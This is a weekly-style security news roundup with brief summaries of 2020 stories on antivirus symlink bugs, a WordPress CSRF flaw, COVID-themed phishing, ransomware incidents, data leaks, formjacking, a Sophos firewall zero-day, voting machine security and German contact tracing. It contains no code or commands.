Table of Contents

  1. Vulnerabilities
    1. Symlink race bugs discovered in 28 antivirus products
    2. WordPress plugin bug lets hackers create rogue admin accounts
    3. Beware of the GIF: Account Takeover Vulnerability in Microsoft Teams
  2. Phishing
    1. Phishing uses lay-off Zoom meeting alerts to steal credentials
    2. Fake FedEx and UPS delivery issues used in COVID-19 phishing
  3. Ransomware
    1. Lucy malware for Android adds file-encryption for ransomware ops
    2. Colorado Hospital Hit by Ransomware as COVID-19 Continues
    3. Shade Ransomware shuts down, releases 750K decryption keys
  4. Leaks
    1. Number-plate cam site had no password, spills 9M logs of UK road journeys
    2. Warwick University was hacked and kept breach secret from students and staff
  5. Malware
    1. Anatomy of Formjacking Attacks
    2. Hackers are exploiting a Sophos firewall zero-day
    3. Asnarök malware exploits firewall zero-day to steal credentials
  6. Politics
    1. Why a Data-Security Expert Fears U.S. Voting Will Be Hacked
  7. Privacy
    1. Germany flips to Apple-Google approach on smartphone contact tracing

Vulnerabilities

Symlink race bugs discovered in 28 antivirus products

Security researchers from RACK911 Labs said in a report published this week that they found "symlink race" vulnerabilities in 28 of today's most popular antivirus products. RACK911 says the bugs can be exploited by an attacker to delete files used by the antivirus or by the operating system, resulting in crashes or rendering the computer unusable. The vulnerability at the heart of these bugs is called a "symlink race," Dr. Vesselin Bontchev, a member of the National Laboratory of Computer Virology at the Bulgarian Academy of Sciences, told ZDNet.

WordPress plugin bug lets hackers create rogue admin accounts

WordPress' owners are advised to secure their websites by updating the Real-Time Find and Replace plugin to prevent attackers from injecting malicious code into their sites and creating rogue admin accounts by exploiting a Cross-Site Request Forgery flaw. The security vulnerability is a Cross-Site Request Forgery (CSRF) that leads to Stored Cross-Site Scripting (Stored XSS) attacks and it impacts all Real-Time Find and Replace versions up to 3.9. It can be abused to trick WordPress admins into injecting malicious JavaScript into their own websites' pages after clicking a malicious link within a comment or email.

Beware of the GIF: Account Takeover Vulnerability in Microsoft Teams

CyberArk discovered a bug that if abused by leveraging a subdomain takeover vulnerability in Microsoft Teams, attackers could have used a malicious GIF to scrape user's data and ultimately take over an organization's entire roster of Teams accounts. Since users wouldn't have to share the GIF -- just see it -- to be impacted, vulnerabilities like these have the ability to spread automatically. This vulnerability would have affected every user who uses the Teams desktop or web browser version.

Phishing

Phishing uses lay-off Zoom meeting alerts to steal credentials

Zoom users are targeted by a new phishing campaign that uses fake Zoom meeting notifications to threaten those who work in corporate environments that their contracts will either be suspended or terminated. So far this series of phishing attacks that spoof automated Zoom meeting alerts has landed in the mailboxes of over 50,000 targets according to researchers as email security company Abnormal Security. Potential victims are more willing to trust such emails during this time given that a lot of employees are now working from home and take part in daily online meetings through video conferencing platforms like Zoom because of stay-at-home orders and lockdowns caused by the COVID-19 pandemic.

Fake FedEx and UPS delivery issues used in COVID-19 phishing

As people socially isolate and work from home, shopping online and home deliveries have increased. Scammers are capitalizing on this by creating new scams using Coronavirus delivery issues as a lure to get people to visit malicious links or open malware. In a new report by Kaspersky, researchers see a new wave of phishing scams that utilize a COVID-19 theme and impersonate well-known shipping carriers such as FedEx, UPS, and DHL.

Ransomware

Lucy malware for Android adds file-encryption for ransomware ops

A threat actor focusing on Android systems has expanded their malware-as-a-service (MaaS) business with file-encrypting capabilities for ransomware operations. Named Lucy Gang by researchers, the actor is a Russian-speaking team that made itself known two years ago with the Black Rose Lucy service, offering botnet and malware dropping capabilities for Android devices. The new feature allows customers of the service to encrypt files on infected devices and show a ransom note in the browser window asking for $500. The message purports to be from the FBI and accuses the victim of storing adult content on the mobile device.

Colorado Hospital Hit by Ransomware as COVID-19 Continues

Parkview Medical Center was hit with a ransomware attack on April 21, according to Fox 21 News. As of Monday, the hospital's website still displayed a message saying it was "currently experiencing a network outage." A Parkview employee told Fox 21 News that the attack involved ransomware rendering the hospitals' patient records systems inoperable.

Shade Ransomware shuts down, releases 750K decryption keys

The operators behind the Shade Ransomware (Troldesh) have shut down their operations, released over 750,000 decryption keys, and apologized for the harm they caused their victims. The Shade Ransomware has been in operation since around 2014. Unlike other ransomware families that specifically avoid encrypting victims in Russia and other CIS countries, Shade targets people in Russia and Ukraine predominantly.

Leaks

Number-plate cam site had no password, spills 9M logs of UK road journeys

The unsecured management dashboard could have been used by anyone who found it to reconstruct a particular vehicle's journey, or series of journeys, from its number plate, right down to the minute with ease. A malicious person could have renamed the cameras or altered key metadata shown to operators, such as a camera's location, direction, and unique identifying number. Privacy International's Edin Omanovic lamented over the privacy-busting potential of the system, telling The Register: "Time and again we've seen the introduction of surveillance tech for very specific purposes, only to creep into other areas of enforcement." Omanovic continued.

Warwick University was hacked and kept breach secret from students and staff

Hackers accessed the University of Warwick's administrative network last year in an attack which has been kept secret from the affected individuals and organizations, Sky News has learned. The security incident occurred when a staff member installed remote-viewing software enabling hackers to steal sensitive personal information on students, staff and even volunteers taking part in research studies. Because cyber security protections at the university were so poor, as per the findings of an internal report revealed by Sky News earlier this month, it was impossible for the university to identify what data had been stolen.

Malware

Anatomy of Formjacking Attacks

The rise of the Internet has contributed positively in many ways to people's lives and you can find almost any service on the internet now. However, the convenience of the internet also opens a gate to use malware to steal people's confidential information, and unfortunately, more and more malware authors are taking advantage of this. Formjacking, where cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site's form page to collect sensitive user information, is one of the fastest growing forms of cyberattack. It is designed to steal credit card details and other personal information from payment forms that are captured on the "checkout" pages of e-commerce websites.

Hackers are exploiting a Sophos firewall zero-day

Cyber-security firm Sophos has published an emergency security update on Saturday to patch a zero-day vulnerability in its XG enterprise firewall product that was being abused in the wild by hackers. Sophos said it first learned of the zero-day on late Wednesday, April 22, after it received a report from one of its customers. The customer reported seeing "a suspicious field value visible in the management interface." After investigating the report, Sophos determined this was an active attack and not an error in its product.

Asnarök malware exploits firewall zero-day to steal credentials

Some Sophos firewall products were attacked with a new Trojan malware, dubbed Asnarök by researchers cyber-security firm Sophos, to steal usernames and hashed passwords starting with April 22 according to an official timeline. The malware exploits a zero-day SQL injection vulnerability that can lead to remote code execution on any unpatched physical and virtual firewalls it targets. "There was significant orchestration involved in the execution of the attack, using a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for a firewall operating system," Sophos said in an advisory published over the weekend.

Politics

Why a Data-Security Expert Fears U.S. Voting Will Be Hacked

In 2005, a concerned Florida election supervisor asked the Finnish data-security expert Harri Hursti to hack into one of the state's commonly used voting machines to test its vulnerability. The verdict wasn't reassuring. By modifying just a few lines of code on the machine's memory card, Mr. Hursti says, he could change the results of a mock election. That same model, he adds, will be among those used in the 2020 elections. (A spokesperson for the machine's vendor, Dominion Voting, says that these weaknesses were fixed in 2012, but Mr. Hursti says that he has tested the new version and found the updates insufficient.)

Privacy

Germany flips to Apple-Google approach on smartphone contact tracing

Countries are rushing to develop apps to give a detailed picture of the risk of catching the Coronavirus, as the chain of infection is proving hard to break because it can be spread by those showing no symptoms. Chancellery Minister Helge Braun and Health Minister Jens Spahn said in a joint statement that Berlin would adopt a "decentralized" approach to digital contact tracing, thus abandoning a home-grown alternative that would have given health authorities central control over tracing data. In Europe, most countries have chosen short-range Bluetooth "handshakes" between mobile devices as the best way of registering a potential contact, even though it does not provide location data. But they have disagreed about whether to log such contacts on individual devices or on a central server - which would be more directly useful to existing contact tracing teams that work phones and knock on doors to warn those who may be at risk.